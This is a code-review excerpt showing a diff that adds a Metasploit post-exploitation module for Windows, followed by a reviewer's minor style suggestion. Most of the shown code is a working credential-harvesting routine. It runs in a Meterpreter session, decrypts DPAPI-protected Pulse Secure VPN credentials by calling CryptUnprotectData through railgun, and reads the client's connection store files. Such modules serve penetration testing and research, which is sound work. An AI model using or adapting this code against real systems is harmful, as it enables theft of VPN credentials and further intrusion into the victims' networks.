modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -0,0 +1,369 @@
+          [ 'URL', 'https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store'],
+          [ 'URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601' ]
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Author' => ['Quentin Kaiser <kaiserquentin[at]gmail.com>']
+      )
+    )
+
+  end
+
+  # Decrypts `data` encrypted with Windows DPAPI by calling CryptUnprotectData
+  # with `entropy` as pOptionalEntropy value.
+  #
+  # @param [String] data Encrypted data, pDataIn per crypt32.dll.
+  # @param [String] entropy Optional entropy value, pOptionalEntropy per crypt32.dll
+  #
+  # @return [String] Decrypted value or empty string in case of failure.
+  #
+  def decrypt_reg(data, entropy)
+    rg = session.railgun
+    pid = session.sys.process.getpid
+    process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
+
+    # write entropy to memory
+    emem = process.memory.allocate(128)
+    process.memory.write(emem, entropy)
+    # write encrypted data to memory
+    mem = process.memory.allocate(128)
+    process.memory.write(mem, data)
+
+    if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
+      addr = [mem].pack('V')
+      len = [data.length].pack('V')
+
+      eaddr = [emem].pack('V')
+      elen = [entropy.length].pack('V')
+
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 0, 8)
+      len, addr = ret['pDataOut'].unpack('V2')
+    else
+      # Convert using rex, basically doing: [mem & 0xffffffff, mem >> 32].pack("VV")
+      addr = Rex::Text.pack_int64le(mem)
+      len = Rex::Text.pack_int64le(data.length)
+
+      eaddr = Rex::Text.pack_int64le(emem)
+      elen = Rex::Text.pack_int64le(entropy.length)
+
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 0, 16)
+      p_data = ret['pDataOut'].unpack('VVVV')
+      len = p_data[0] + (p_data[1] << 32)
+      addr = p_data[2] + (p_data[3] << 32)
+    end
+    return '' if len == 0
+
+    return process.memory.read(addr, len)
+  end
+
+  # Parse IVEs definitions from Pulse Secure Connect client connection store
+  # files. Each definition is converted into a Ruby hash holding a connection source,
+  # a friendly name, a URI, and an array of credentials. These Ruby hashes are stored
+  # into another Ruby hash, indexed by IVE identifiers.
+  #
+  # @return [hash] A Ruby hash indexed by IVE identifier
+  #
+  def find_ives
+    connstore_paths = [
+      'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\connstore.dat',
+      'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\connstore.bak',
+      'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\connstore.tmp'
+    ]
+    begin
+      ives = {}
+      connstore_paths.each do |path|
+        if !session.fs.file.exist?(path)
+          next
+        end
```

Comment:
This style would match the style used a couple lines below:

```suggestion
        next unless session.fs.file.exist?(path)
```